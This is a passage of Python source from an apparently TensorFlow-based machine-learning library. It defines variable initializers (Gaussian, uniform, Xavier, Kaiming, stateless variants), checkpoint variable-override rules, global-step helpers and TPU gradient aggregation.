  # Dispatch on the (possibly rescaled) method family.
  if method in [
      'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
      'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
  ]:
    v_init = init_ops.random_normal_initializer(
        mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
  elif method in ['uniform', 'uniform_sqrt_dim']:
    v_init = init_ops.random_uniform_initializer(
        minval=-scale, maxval=scale, seed=seed, dtype=init_dtype)
  elif method in ['uniform_positive']:
    v_init = init_ops.random_uniform_initializer(
        minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
  elif method == 'category':
    # Uniform reals in [0, scale) floored to integer-valued categories.
    uniform_init = init_ops.random_uniform_initializer(
        minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
    v_init = lambda *args, **kwargs: tf.floor(uniform_init(*args, **kwargs))
  elif method in ['uniform_unit_scaling']:
    v_init = init_ops.uniform_unit_scaling_initializer(
        factor=scale, seed=seed, dtype=init_dtype)
  elif method in ['uniform_unit_scaling_fan_avg']:
    v_init = tf.variance_scaling_initializer(
        scale=scale,
        mode='fan_avg',
        distribution='uniform',
        seed=seed,
        dtype=init_dtype)
  elif method in [
      'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
      'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
  ]:
    v_init = init_ops.truncated_normal_initializer(
        mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
  elif method in ['constant']:
    v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
  elif method in ['xavier', 'geo_mean_xavier']:
    def XavierUniform(shape, dtype):
      """Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
      if not shape:
        raise ValueError(
            '\'shape\' must not be \'None\' or 0 for XavierUniform')
      fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
      if method == 'xavier':
        limit = math.sqrt(6. / (fan_in + fan_out))
      elif method == 'geo_mean_xavier':
        limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
      return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
    v_init = XavierUniform
  elif method in [
      'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
  ]:
    # He/Kaiming uniform: bound = sqrt(3) * gain / sqrt(fan_in).
    fan_in = np.prod(shape[:-1])
    if method == 'kaiming_uniform_fanin_leakyrelu':
      # Assume the 'a' parameter is the 'scale' argument.
      gain = np.sqrt(2. / (1 + scale**2))
    else:
      gain = np.sqrt(2.)
    std_dev = gain / np.sqrt(fan_in)
    bound = np.sqrt(3.0) * std_dev
    v_init = init_ops.random_uniform_initializer(
        minval=-bound, maxval=bound, seed=seed, dtype=init_dtype)
  elif method in ['custom', 'custom_constant']:
    v_init = custom_v_init
  else:
    assert False, 'init_type `%s` not supported.' % method
  return v_init
def _GenerateStatelessRngSeed(name, seed):
  """Builds the 2-element seed used by stateless variable initializers.

  Stateless RNG ops produce identical values for identical (seed, shape)
  pairs, so the variable name is hashed into the second seed component to
  keep distinct variables from sharing initial values.

  Args:
    name: The variable name to fold into the seed.
    seed: The user-specified scalar seed; None is treated as 0.

  Returns:
    A rank-1 tf.int32 constant [user_seed, name_hash] (TPU compatible).
  """
  user_component = 0 if not seed else seed
  name_component = GenerateSeedFromName(name)
  return tf.constant([user_component, name_component], dtype=tf.int32)
def _DeterministicRandomNormalInitializer(seed, mean, stddev):
  """Returns a stateless (deterministic) normal initializer."""

  def _Init(shape, dtype):
    return stateless_random_ops.stateless_random_normal(
        shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)

  return _Init
def _DeterministicRandomUniformInitializer(seed, minval, maxval):
  """Returns a stateless (deterministic) uniform initializer."""

  def _Init(shape, dtype):
    return stateless_random_ops.stateless_random_uniform(
        shape=shape, seed=seed, minval=minval, maxval=maxval, dtype=dtype)

  return _Init
def _DeterministicRandomTruncatedNormalInitializer(seed, mean, stddev):
  """Returns a stateless (deterministic) truncated normal initializer."""

  def _Init(shape, dtype):
    return stateless_random_ops.stateless_truncated_normal(
        shape=shape, seed=seed, mean=mean, stddev=stddev, dtype=dtype)

  return _Init
def _DeterministicRandomUniformUnitScalingInitializer(seed, factor):
  """Returns a stateless uniform unit-scaling initializer."""

  def _Init(shape, dtype):
    # Mirrors UniformUnitScaling.__call__ in TensorFlow's
    # python/ops/init_ops.py: estimate the input size as the product of all
    # but the last dimension, which is the right estimate for matrix
    # multiplies and convolutions.
    fan_in = 1.0
    for dim in shape[:-1]:
      fan_in *= float(dim)
    # Guard against zero-size tensors.
    fan_in = max(fan_in, 1.0)
    bound = math.sqrt(3 / fan_in) * factor
    return stateless_random_ops.stateless_random_uniform(
        shape=shape, seed=seed, minval=-bound, maxval=bound, dtype=dtype)

  return _Init
def _DeterministicRandomVarianceScalingInitializer(scale, mode, distribution,
                                                   seed):
  """Creates a stateless (deterministic) variance scaling initializer.

  Args:
    scale: Positive base scaling factor.
    mode: One of 'fan_in', 'fan_out', 'fan_avg'; selects the normalization.
    distribution: One of 'normal', 'uniform', 'truncated_normal',
      'untruncated_normal' (case-insensitive).
    seed: 2-element seed tensor for the stateless random ops.

  Returns:
    A callable (shape, dtype) -> Tensor usable as a variable initializer.

  Raises:
    ValueError: If `scale`, `mode` or `distribution` is invalid.
  """
  if scale <= 0.:
    raise ValueError('`scale` must be positive float.')
  if mode not in {'fan_in', 'fan_out', 'fan_avg'}:
    raise ValueError('Invalid `mode` argument:', mode)
  distribution = distribution.lower()
  if distribution not in {
      'normal', 'uniform', 'truncated_normal', 'untruncated_normal'
  }:
    raise ValueError('Invalid `distribution` argument:', distribution)
  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()

  def DeterministicVarianceScaling(shape, dtype):
    # This is originally from TensorFlow: python/ops/init_ops.py
    scale_shape = shape
    # Handle special case of empty list as shape, since fan_in and fan_out
    # are numerically added below. Without this, GetFanInFanOut() would
    # return None, None instead.
    if isinstance(scale_shape, (list, tuple)) and not scale_shape:
      fan_in, fan_out = 1, 1
    else:
      fan_in, fan_out = GetFanInFanOut(scale_shape, combined_layers_dims)
    # Normalize the variance by the selected fan statistic.
    if mode == 'fan_in':
      scale_inner = scale / max(1., fan_in)
    elif mode == 'fan_out':
      scale_inner = scale / max(1., fan_out)
    else:
      scale_inner = scale / max(1., (fan_in + fan_out) / 2.)
    if distribution == 'normal' or distribution == 'truncated_normal':
      # constant taken from scipy.stats.truncnorm.std(
      # a=-2, b=2, loc=0., scale=1.)
      stddev = math.sqrt(scale_inner) / .87962566103423978
      return stateless_random_ops.stateless_truncated_normal(
          shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
    elif distribution == 'untruncated_normal':
      stddev = math.sqrt(scale_inner)
      return stateless_random_ops.stateless_random_normal(
          shape=shape, seed=seed, mean=0.0, stddev=stddev, dtype=dtype)
    else:
      # 'uniform': match the variance via limit = sqrt(3 * scale).
      limit = math.sqrt(3.0 * scale_inner)
      return stateless_random_ops.stateless_random_uniform(
          shape=shape, seed=seed, minval=-limit, maxval=limit, dtype=dtype)

  return DeterministicVarianceScaling
def _DeterministicRandomXavierUniformInitializer(method, scale, seed):
  """Creates a stateless (deterministic) Xavier uniform initializer.

  (The previous one-line summary incorrectly described this as a variance
  scaling initializer.)

  Args:
    method: Either 'xavier' or 'geo_mean_xavier', selecting how the uniform
      limit is derived from fan-in/fan-out.
    scale: Multiplier applied to the sampled values.
    seed: 2-element seed tensor for the stateless random op.

  Returns:
    A callable (shape, dtype) -> Tensor usable as a variable initializer.
  """
  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()

  def XavierUniform(shape, dtype):
    """Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
    if not shape:
      raise ValueError('\'shape\' must not be \'None\' or 0 for XavierUniform')
    fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if method == 'xavier':
      limit = math.sqrt(6. / (fan_in + fan_out))
    elif method == 'geo_mean_xavier':
      limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
    else:
      # Previously an unknown method surfaced as an UnboundLocalError on
      # 'limit'; fail with a clear error instead.
      raise ValueError('Unknown Xavier initialization method: %s' % method)
    return scale * stateless_random_ops.stateless_random_uniform(
        shape, seed, -limit, limit, dtype)

  return XavierUniform
def _CreateVarInitStateless(name,
                            method,
                            shape,
                            dim0,
                            seed,
                            scale,
                            init_dtype,
                            custom_v_init=None):
  """Creates variable initialization function for a stateless RNG.

  Mirrors _CreateVarInitStateful but uses deterministic stateless random ops,
  so initialization depends only on `seed` and `shape`.

  Args:
    name: Variable name, used only for logging.
    method: Initialization method name, e.g. 'gaussian', 'uniform', 'xavier'.
      The *_sqrt_dim / *_sqrt_fanin / *_sqrt_fanout / *_sqrt_fanavg variants
      first rescale `scale` by the corresponding dimension statistic.
    shape: Shape of the variable to initialize.
    dim0: Leading-dimension size used by the *_sqrt_dim methods.
    seed: 2-element seed tensor for the stateless random ops.
    scale: Base scale (stddev / bound / constant value, depending on method).
    init_dtype: dtype in which initialization is performed.
    custom_v_init: Initializer returned verbatim for the 'custom' and
      'custom_constant' methods.

  Returns:
    An initializer: either a TF initializer object or a callable
    (shape, dtype) -> Tensor.
  """
  # The *_sqrt_dim variants divide the scale by sqrt(dim0).
  if (method in [
      'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
  ]):
    if len(shape) > 2:
      # This is probably not the right method to use when len(shape) > 2,
      # e.g. dim0 will be 3 with a 3x3 conv2d kernel.
      tf.logging.warning(
          'Initializing %s of shape %s with method %s: dim0=%s. '
          'Make sure that it is intended.', name, shape, method, dim0)
    scale *= 1.0 / math.sqrt(dim0)
  # Rescale by fan-in/fan-out statistics for the corresponding variants.
  combined_layers_dims = GetVariableNumLeadingDimsForCombinedLayersContext()
  if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
    fan_in, _ = GetFanInFanOut(shape, combined_layers_dims)
    if fan_in is not None:
      scale *= 1.0 / math.sqrt(fan_in)
  if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
    _, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if fan_out is not None:
      scale *= 1.0 / math.sqrt(fan_out)
  if method in ['gaussian_sqrt_fanavg']:
    fan_in, fan_out = GetFanInFanOut(shape, combined_layers_dims)
    if fan_in is not None and fan_out is not None:
      scale *= math.sqrt(2.0 / (fan_in + fan_out))
  # Dispatch on the (possibly rescaled) method family.
  # NOTE: unlike the stateful path, 'category' is not supported here.
  if method in [
      'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
      'gaussian_sqrt_fanout', 'gaussian_sqrt_fanavg'
  ]:
    v_init = _DeterministicRandomNormalInitializer(
        seed=seed, mean=0., stddev=scale)
  elif method in ['uniform', 'uniform_sqrt_dim']:
    v_init = _DeterministicRandomUniformInitializer(
        seed=seed, minval=-scale, maxval=scale)
  elif method in ['uniform_positive']:
    v_init = _DeterministicRandomUniformInitializer(
        seed=seed, minval=0., maxval=scale)
  elif method in ['uniform_unit_scaling']:
    v_init = _DeterministicRandomUniformUnitScalingInitializer(
        seed=seed, factor=scale)
  elif method in ['uniform_unit_scaling_fan_avg']:
    v_init = _DeterministicRandomVarianceScalingInitializer(
        scale=scale, mode='fan_avg', distribution='uniform', seed=seed)
  elif method in [
      'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
      'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
  ]:
    v_init = _DeterministicRandomTruncatedNormalInitializer(
        seed=seed, mean=0., stddev=scale)
  elif method in ['constant']:
    # Constant init is deterministic already; reuse the stateful initializer.
    v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
  elif method in ['xavier', 'geo_mean_xavier']:
    v_init = _DeterministicRandomXavierUniformInitializer(method, scale, seed)
  elif method in [
      'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
  ]:
    # He/Kaiming uniform: bound = sqrt(3) * gain / sqrt(fan_in).
    fan_in = np.prod(shape[:-1])
    if method == 'kaiming_uniform_fanin_leakyrelu':
      # Assume the 'a' parameter is the 'scale' argument.
      gain = np.sqrt(2. / (1 + scale**2))
    else:
      gain = np.sqrt(2.)
    std_dev = gain / np.sqrt(fan_in)
    bound = np.sqrt(3.0) * std_dev
    v_init = _DeterministicRandomUniformInitializer(
        seed=seed, minval=-bound, maxval=bound)
  elif method in ['custom', 'custom_constant']:
    v_init = custom_v_init
  else:
    assert False, 'init_type %s not supported.' % method
  return v_init
# Cached per-process top-level VariableScope; populated lazily by
# GetGlobalVariableScope().
_global_variable_scope = None


def GetGlobalVariableScope():
  """Gets the global variable scope (as if no variable_scope has been set).

  Returns:
    The VariableScope corresponding to as if no tf.variable_scope is in effect.
  """
  if not _global_variable_scope:
    # Each thread gets its own default global variable scope, and we take
    # advantage of that in order to get a top-level scope. This avoids the
    # need to call tf.get_variable_scope() at the module level, which allows
    # this module to be imported without modifying global state (i.e. creating
    # the default graph). It is important to not mutate the global state at
    # module load time, because it lets us flip flags after import that affect
    # core TensorFlow behavior.
    def Initialize():
      global _global_variable_scope
      _global_variable_scope = tf.get_variable_scope()

    # Run Initialize on a fresh thread so it observes that thread's default
    # (top-level) variable scope.
    t = threading.Thread(target=Initialize)
    t.start()
    t.join()
  return _global_variable_scope
# Thread-local stack of global-step tensor overrides; see GlobalStepContext.
_GLOBAL_STEP_STACK = ThreadLocalStack()


@contextlib.contextmanager
def GlobalStepContext(global_step_tensor):
  """Makes `global_step_tensor` the value returned by GetGlobalStep() within."""
  _GLOBAL_STEP_STACK.stack.append(global_step_tensor)
  try:
    yield
  finally:
    # Always unwind, even if the body raises.
    _GLOBAL_STEP_STACK.stack.pop()
def GetGlobalStep():
  """Returns the global step tensor, preferring any active GlobalStepContext."""
  overrides = _GLOBAL_STEP_STACK.stack
  return overrides[-1] if overrides else tf.train.get_global_step()
def GetOrCreateGlobalStepVar():
  """Returns the global_step variable, creating it if it does not exist.

  Prefer GetGlobalStep if a tensor rather than a tf.Variable is sufficient.

  Returns:
    The global_step variable, or a newly created one if it did not exist.
  """
  with tf.variable_scope(GetGlobalVariableScope(), use_resource=True):
    if not _FromGlobal('pin_vars_to_cpu'):
      return tf.train.get_or_create_global_step()
    # Optionally pin the global step to the CPU.
    with tf.device('/cpu:0'):
      return tf.train.get_or_create_global_step()
def LogMultiLines(label, lines):
  """Logs each line of `lines` (a string or list/tuple of strings) under `label`."""
  if isinstance(lines, (list, tuple)):
    split_lines = lines
  else:
    split_lines = lines.split('\n')
  for one_line in split_lines:
    tf.logging.info('%s: %s', label, one_line)
def _LogPlacement(label, theta, copy):
  """Logs theta and its copy's device placement."""

  def _Devices(nested):
    """Returns the device of each tensor in the `.NestedMap` `nested`."""
    return [t.device for t in nested.Flatten()]

  placements = [
      '%s -> %s' % (src, dst)
      for src, dst in zip(_Devices(theta), _Devices(copy))
  ]
  tf.logging.info('=== %s ===', label)
  LogMultiLines(label, theta.Pack(placements).DebugString())
  tf.logging.info('==========')
def CreateLocalTheta(theta, device_list=None, label=None):
  """Creates local copy of theta and shards across devices device list.

  Variables are passed through untouched; every other tensor is wrapped in a
  tf.identity placed on one of the devices, assigned round-robin.

  Args:
    theta: a `.NestedMap` of variables.
    device_list: list of devices to shard across. If None, defaults to a list
      [''].
    label: Logging label.

  Returns:
    A `.NestedMap` of identity() wrapped theta
  """

  class _RoundRobinIdentity:
    """Wraps non-variable values in identity ops, cycling over devices."""

    def __init__(self, devices):
      self._devices = devices if devices else ['']
      self._next = 0

    def __call__(self, value):
      if isinstance(value, tf.Variable):
        return value
      with tf.device(self._devices[self._next % len(self._devices)]):
        self._next += 1
        return tf.identity(value)

  copy = theta.Transform(_RoundRobinIdentity(device_list))
  _LogPlacement(label, theta, copy)
  return copy
def _GetVarsToLoad(all_vars,
                   variable_loading_rules,
                   var_ignore_rules,
                   ckpt_path,
                   suppress_logging=False):
  """Determines variables to load and their names in checkpoint.

  Args:
    all_vars: List of model variables to match against the loading rules.
    variable_loading_rules: List of (regex, name_format) tuples; the first
      rule whose regex matches a variable's name determines its checkpoint
      name via `name_format % match.groups()`.
    var_ignore_rules: List of regexes; a variable matching any of these is
      never loaded, even if a loading rule matches it.
    ckpt_path: Checkpoint path, used only for logging.
    suppress_logging: If True, skip all per-variable logging.

  Returns:
    A list of (checkpoint_var_name, model_var) pairs.
  """
  # Tracks rules that never matched any variable, so we can warn about them.
  unused_rules = {
      regexp: name_format for regexp, name_format in variable_loading_rules
  }
  # This list contains mappings from var names as they appear in the checkpoint
  # to the vars in our model they correspond to.
  vars_to_load = []
  for model_var in all_vars:
    loaded = False
    for regexp, name_format in variable_loading_rules:
      match = re.match(regexp, model_var.name)
      # Skip if var doesn't match the loading rules, or if it should be ignored.
      if not match:
        if not suppress_logging:
          tf.logging.debug('Loading rules do not match %s.', model_var.name)
        continue
      elif any(re.match(r, model_var.name) for r in var_ignore_rules):
        if not suppress_logging:
          tf.logging.debug('Ignoring %s from loading.', model_var.name)
        continue
      checkpoint_var_name = name_format % match.groups()
      # Strip the tensor output suffix; checkpoint keys have no ':0'.
      if checkpoint_var_name.endswith(':0'):
        checkpoint_var_name = checkpoint_var_name[:-2]
      if not suppress_logging:
        tf.logging.info('Loading %s from %s with regexp: %s', model_var.name,
                        checkpoint_var_name, regexp)
      vars_to_load.append((checkpoint_var_name, model_var))
      unused_rules.pop(regexp, None)
      loaded = True
      break
    if not loaded and not suppress_logging:
      tf.logging.info(
          'Not loading model variable %s from %s as it does not match any rules'
          ' or matches ignored', model_var.name, ckpt_path)
  if not suppress_logging:
    for regexp, name_format in unused_rules.items():
      tf.logging.warning(f'User provided rule matched no variables: ({regexp}, '
                         f'{name_format})')
  return vars_to_load
def OverrideVarsFromCheckpoint(all_vars, checkpoint_path,
                               variable_loading_rules, var_ignore_rules):
  """Add TF graph ops to override variables from a provided checkpoint.

  Args:
    all_vars: List of all the parameters in the model.
    checkpoint_path: A path to the checkpoints of a pretrained model.
    variable_loading_rules: A list of tuples of strings defining (regex to match
      parameter names in the model to override, format string to determine the
      corresponding var in the checkpoint).
    var_ignore_rules: A list consisting of a list of regexes to match parameter
      names in the model which should not be overridden, even if they match
      those in the loading rules.

  Returns:
    A callable that, when called with a tf.Session, will restore the variables
    from the provided checkpoint.

  Raises:
    ValueError: If no variable matches the loading rules.
  """
  vars_to_load = _GetVarsToLoad(all_vars, variable_loading_rules,
                                var_ignore_rules, checkpoint_path)
  if not vars_to_load:
    all_rules_text = '\n'.join(
        [f'{k} --> {v}' for k, v in variable_loading_rules])
    raise ValueError(f'Variable loading rules {all_rules_text} '
                     f'did not match any of {len(all_vars)} vars.')
  load_var_names = '\n'.join(sorted([v.name for _, v in vars_to_load]))
  tf.logging.info(f'Overriding {len(vars_to_load)} vars from '
                  f'{checkpoint_path}:\n{load_var_names}')
  savers = []
  while vars_to_load:
    # When restoring, it's possible the same value in the checkpoint
    # can be restored to multiple variables (e.g. during
    # distillation). However, tf.train.Saver, since it's used for
    # both saving and restoring, requires the name in the checkpoint
    # to be unique for each variable. So, we call it multiple times
    # with a unique set of names each time.
    unique_vars_to_load = {}
    remaining_vars_to_load = []
    for k, v in vars_to_load:
      if k not in unique_vars_to_load:
        unique_vars_to_load[k] = v
      else:
        # Duplicate checkpoint name: defer to a later Saver.
        remaining_vars_to_load.append((k, v))
    savers.append(tf.train.Saver(var_list=unique_vars_to_load, sharded=True))
    vars_to_load = remaining_vars_to_load

  def _Restore(sess):
    # Each saver restores its de-duplicated subset from the same checkpoint.
    for saver in savers:
      saver.restore(sess, checkpoint_path)

  return _Restore
def OverrideVarsFromCheckpoints(all_vars, ckpts_loading_rules):
  """Add TF graph ops to override model variables from checkpoints.

  Args:
    all_vars: List of all the parameters in the model.
    ckpts_loading_rules: A dictionary of checkpoint path: loading rules.
      Checkpoint path must be a path to a pretrained model, and loading rules
      is expected to be a tuple of two lists. The first consisting of tuples
      of strings defining (regex to match parameter names in the model to
      override, format string to determine the corresponding var in the
      checkpoint), and the second list consisting of a list of regexes to
      match parameter names in the model which should not be overridden, even
      if they match those in the loading rules.

  Returns:
    A callable that, when called with a tf.Session, will restore the variables
    from checkpoint and return a list of overwritten variables.

  Raises:
    ValueError: if colliding vars exist or loading rules is not a list.
  """
  if len(ckpts_loading_rules) > 1:
    tf.logging.info('Overriding vars from multiple checkpoints.')
  # Track which variables (by ref and by name) have already been claimed by an
  # earlier checkpoint, so cross-checkpoint collisions can be detected.
  var_refs_overridden = set()
  var_names_overridden = set()
  restore_fns = []
  for ckpt_path, loading_rules in ckpts_loading_rules.items():
    tf.logging.info('Overriding vars from checkpoint: %s', ckpt_path)
    if not isinstance(loading_rules, tuple):
      raise ValueError('Loading rules for %s must be a tuple of two lists!' %
                       ckpt_path)
    if len(loading_rules) != 2 or not all(
        isinstance(l, list) for l in loading_rules):
      raise ValueError('Loading rules for %s must be a tuple of two lists!' %
                       ckpt_path)
    # Filter the model variables to be overridden.
    to_load_vars = _GetVarsToLoad(
        all_vars,
        loading_rules[0],
        loading_rules[1],
        ckpt_path,
        suppress_logging=True)
    var_refs_to_override = [var[1].ref() for var in to_load_vars]
    var_names_to_override = [var[1].name for var in to_load_vars]
    # Fail if a variable is targeted by more than one checkpoint.
    overlap_refs = set.intersection(var_refs_overridden, var_refs_to_override)
    if overlap_refs:
      raise ValueError('Colliding variables to override: %s' % overlap_refs)
    restore_fns.append(
        OverrideVarsFromCheckpoint(all_vars, ckpt_path, loading_rules[0],
                                   loading_rules[1]))
    var_refs_overridden.update(var_refs_to_override)
    var_names_overridden.update(var_names_to_override)

  def _Restore(sess):
    # Run each per-checkpoint restore in insertion order.
    for fn in restore_fns:
      fn(sess)
    tf.logging.info('Model variables overridden: %s', var_names_overridden)
    return var_names_overridden

  return _Restore
def ComputeGradientsSimple(loss_or_activations,
                           all_vars,
                           grad_aggregation_method,
                           colocate_gradients_with_ops,
                           gate_gradients,
                           activations_grad=None):
  """Computes gradients of `loss_or_activations` w.r.t. `all_vars`.

  In eager mode with an active gradient tape, the tape is used and the
  tf.gradients-only arguments are ignored (with a warning). Otherwise this
  delegates to tf.gradients.

  Args:
    loss_or_activations: Tensor(s) to differentiate.
    all_vars: Variables/tensors to compute gradients with respect to.
    grad_aggregation_method: Aggregation method passed to tf.gradients.
    colocate_gradients_with_ops: Whether to colocate gradient ops with the
      original ops (tf.gradients only).
    gate_gradients: Whether to gate gradients (tf.gradients only).
    activations_grad: Optional grad_ys passed to tf.gradients. Not supported
      with GradientTape.

  Returns:
    A list of gradients aligned with `all_vars`.

  Raises:
    ValueError: If a gradient tape is active and `activations_grad` is set.
  """
  tape = _GRADIENT_TAPE_STACK.stack[-1] if _GRADIENT_TAPE_STACK.stack else None
  if IsEagerMode() and tape:
    tf.logging.info('ComputeGradientsSimple: using gradient tape.')
    if activations_grad is not None:
      raise ValueError('GradientTape does not accept gradient input values.')
    if grad_aggregation_method or colocate_gradients_with_ops or gate_gradients:
      # Fixed message typo: 'these field' -> 'these fields'.
      tf.logging.warning(
          'When GradientTape is used, these fields will be ignored: '
          f'grad_aggregation_method ({grad_aggregation_method}), '
          f'colocate_gradients_with_ops ({colocate_gradients_with_ops}), '
          f'gate_gradients ({gate_gradients}).')
    return tape.gradient(
        loss_or_activations,
        all_vars,
        unconnected_gradients=tf.UnconnectedGradients.NONE)
  return tf.gradients(
      loss_or_activations,
      all_vars,
      grad_ys=activations_grad,
      aggregation_method=grad_aggregation_method,
      colocate_gradients_with_ops=colocate_gradients_with_ops,
      gate_gradients=gate_gradients)
def _ComputeGradientsTpu(loss_or_activations,
                         all_vars,
                         grad_aggregation_method,
                         colocate_gradients_with_ops,
                         gate_gradients,
                         skip_zero_gradients=None,
                         use_bf16_gradients_ar=False,
                         defer_crs_to_apply_grad=False,
                         activations_grad=None,
                         is_activations=False,
                         tpu_embedding_activations=None):
  """Computes gradients for local loss across whole TPU cluster.

  This implementation specializes for the case where weight params maybe used
  for different number of times in the forward computation, so that gradients
  should be normalized by the actual number of times they are being computed.

  TODO(yonghui): Maybe merge this implementation with the _ComputeGradientsTpu
  one.
  NOTE(review): the TODO above references this same function; the intended
  merge target is unclear — confirm with the original author.

  Args:
    loss_or_activations: The loss or activations to backprop from.
    all_vars: Vars with respect to which gradients are to be computed.
    grad_aggregation_method: aggregation method to use when calling
      tf.gradients.
    colocate_gradients_with_ops: boolean, whether or not to colocate gradient op
      with the original op.
    gate_gradients: boolean, flag to be passed to tf.gradients.
    skip_zero_gradients: whether to skip zero gradients during aggregation.
    use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
      all-reduce.
    defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
      apply_gradient. This helps reducing the number of gradient all-reduces
      when doing gradient accumulation, which does gradient cross replica sum
      only every k steps in a tf.cond. Currently this works only when
      skip_zero_gradients is None.
    activations_grad: The gradients computed for activations.
    is_activations: A boolean, whether the input is loss or activations.
    tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
      embedding feature tensor.

  Returns:
    Gradients to be passed back. If tpu_embedding_activations is set, their
    gradients will be placed at the end.

  Raises:
    ValueError: upon invalid arguments.
  """
  if is_activations:
    assert activations_grad is not None
  if not skip_zero_gradients and not is_activations:
    # Scale the loss to account for the full batch size.
    shards = tpu_function.get_tpu_context().number_of_shards
    assert shards
    loss_or_activations *= tf.constant(
        1.0 / shards, dtype=loss_or_activations.dtype)
  else:
    assert not tpu_embedding_activations, (
        'Gradient computation for tpu embedding activations requires proper '
        'loss scaling, and so is not compatible with skip_zero_gradients and '
        'is_activations.')
  # Computes the gradients.
  # Sum the grads so that we can compute statistics across the whole batch.
  all_grads = ComputeGradientsSimple(
      loss_or_activations=loss_or_activations,
      all_vars=all_vars +
      (tpu_embedding_activations if tpu_embedding_activations else []),
      grad_aggregation_method=grad_aggregation_method,
      colocate_gradients_with_ops=colocate_gradients_with_ops,
      gate_gradients=gate_gradients,
      activations_grad=activations_grad)
  if tpu_embedding_activations:
    # Note we don't need to aggregate TPU embedding gradients below.
    tpu_embedding_grads = all_grads[len(all_vars):]
    all_grads = all_grads[:len(all_vars)]
  else:
    tpu_embedding_grads = []
  # NOTE: We can't use tpu_optimizer.CrossShardOptimizer since
  # we need to scale the grads *after* the cross_replica_sum to
  # match GPU version!
  # TODO(cwhipkey): should we do something different here? - we could do
  # some operations on the gradients before the aggregation (see comments in
  # tensorflow/contrib/tpu/python/tpu/tpu_optimizer.py - see compute_gradients -
  # for some more details).
  aggregated_grads = []
  for g in all_grads:
    if g is None:
      # Keep placeholder Nones so the result stays aligned with all_vars.
      aggregated_grads.append(None)
      continue
    if use_bf16_gradients_ar:
      # Cast before the all-reduce to reduce all-reduce bandwidth.
      g = tf.cast(g, tf.bfloat16)
    with tf.ops.colocate_with(g):
      if skip_zero_gradients is None:
        # loss is already scaled by 1/shards.
        if defer_crs_to_apply_grad:
          normalized_g = tf.convert_to_tensor(g)
        else:
          normalized_g = tf.tpu.cross_replica_sum(g)
      else:
        # Compute the cross-replica mean of 'g', skipping zero gradients.
        # Q(yonghui): Is there a better way to detect a non-zero gradient?
        # Note(yonghui): gradient of a weight can be zero if that
        # weight is not used in the forward computation, e.g. as in
        # switchable layers in neural architecture search, pruned by channel
        # mask, or sparsified.
        if skip_zero_gradients == 'weight':
          # Same shape as 'g'.
          g_is_non_zero = tf.cast(tf.math.abs(g) > 1e-8, g.dtype)
        elif skip_zero_gradients == 'variable':
          # A variable-wide 0/1 scalar.
          g_is_non_zero = tf.cast(
              tf.reduce_sum(tf.math.abs(g)) > 1e-24, g.dtype)
        else:
          raise ValueError('Unknown skip_zero_gradients: %s' %
                           skip_zero_gradients)
        # Average only over replicas that produced a non-zero gradient.
        num_updates = tf.maximum(tf.tpu.cross_replica_sum(g_is_non_zero), 1.0)
        normalized_g = tf.tpu.cross_replica_sum(g) / num_updates
      aggregated_grads.append(normalized_g)
  return aggregated_grads + tpu_embedding_grads
class _VarGrad(typing.NamedTuple):
  """Record of a variable and its gradient; wrapped by the VarGrad class."""
  # The variable (or activation tensor) the gradient applies to.
  var: tf.Tensor
  # The gradient; may be an IndexedSlices for sparse updates.
  grad: Union[tf.Tensor, tf.IndexedSlices]
  # Optional scale; when set, the wrapping VarGrad unpacks to a 3-tuple.
  # NOTE(review): presumably a scaling factor for grad — confirm with callers.
  scale: Optional[tf.Tensor] = None
class VarGrad:
  """A class that holds a variable and a gradient.

  This does not inherit from namedtuple so that tf.nest operations do not
  recurse into it.
  """

  def __init__(self, *args, **kwargs):
    # Delegate storage to the _VarGrad namedtuple (var, grad, scale).
    self._var_grad = _VarGrad(*args, **kwargs)

  def __getitem__(self, key):
    # Tuple-style indexing: 0 -> var, 1 -> grad, 2 -> scale.
    return self._var_grad[key]

  def __getattr__(self, key):
    # Forward attribute access (e.g. .var, .grad, .scale) to the namedtuple.
    return getattr(self._var_grad, key)

  def __iter__(self):
    # Unpacks as (var, grad) when no scale is set, else (var, grad, scale).
    if self._var_grad.scale is None:
      return iter((self._var_grad.var, self._var_grad.grad))
    return iter(self._var_grad)

  def __repr__(self):
    return repr(self._var_grad)
def SkipNoneGradients(var_grads):
  """Filters out VarGrad entries whose gradient is None, logging each drop."""
  for name, (_, grad) in var_grads.FlattenItems():
    if grad is None:
      tf.logging.info('ComputeGradients drops %s', name)
  return var_grads.Filter(lambda vg: vg.grad is not None)
def ComputeGradients(
loss_or_activations,
vmap,
grad_aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE,
colocate_gradients_with_ops=True,
gate_gradients=False,
